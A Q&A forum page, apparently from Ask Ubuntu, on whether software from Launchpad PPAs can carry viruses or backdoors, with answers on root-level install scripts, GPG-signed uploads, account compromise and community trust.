Is there any guarantee that software from Launchpad PPAs is free from viruses and backdoor threats?

security ppa viruses

Solution 1:

Every package's install script has root access to your system, so the mere act of adding a PPA or installing a package from one is an implicit statement of trust on your part of the PPA owner.

So, what happens if your trust is misplaced and a PPA owner wants to be naughty?

In order to upload to a PPA, a package must be signed by a GPG key unique to the launchpad user (indeed, the same key they signed the code of conduct with). So in the case of a known malicious PPA we would simply ban the account and shut down the PPA (affected systems would still be compromised, but there's no good way fix them at that point anyway).

To some extent Launchpad's social features can be used as a bit of a preventative measure of bad users -- someone who has a history of contributing to Ubuntu and some established Launchpad karma, for instance, is less likely to be setting up a trap PPA.

Or what if someone gains control of a PPA that isn't theirs?

Well, this is a bit tougher of a threat scenario, but also less likely since it requires an attacker getting both the launchpad users's private key file (generally only on their computer) as well as the unlock code for it (generally a strong password not used for anything else). If this happens, though, it's usually fairly simple for someone to figure out their account has been compromised (Launchpad will for instance email them about the packages they're not uploading), and the cleanup procedure would be the same.

So, in sum, PPAs are a possible vector for malicious software, but there are probably much easier methods for attackers to come after you.

Solution 2:

Establishing a (perhaps distributed) mechanism of trust ratings for PPAs has been on the USC roadmap for a while, but it hasn't been implemented yet.

Solution 3:

There is never any guarantee but in a community backed environment, we thrive on "belief". I've added atleast 20 PPAs to my sources and never experienced a problem until now. If,by any chance and as you mentioned, a threat/virus/backdoor is planted on my system by a PPA, I'd come to know about it somehow, courtesy of the community and simply remove it. And BTW, before adding a PPA, I always check what packages are listed in it.

PS: Pidgin never sends usernames and passwords to the servers (and never to a third party!) "secretly". Everything is done with the user's consent. In order to keep you connected seamlessly, Pidgin cannot ping you everytime it sends the login credentials to the servers. It is expected that you have authorised it to do so, once you have provided it the details. I'd rather think twice before calling Pidgin a "backdoor". :)

Related

Why am I getting this "Connection to PulseAudio failed" error?
What's the best way to re-enable PPAs/repos after an upgrade?
How do I change the language via a terminal?
Where is syslog.conf?
Sed to delete blank spaces
allowing user to run systemctl/systemd services without password
How can I stop snaps from listing in df?
How to correctly remove OpenJDK/OpenJRE and set SunJDK/SunJRE as Default
GNOME 3 Shell keyboard/mouse shortcuts
Where are startup commands stored?
disk space used up
Cannot find curl-config in Ubuntu 13.04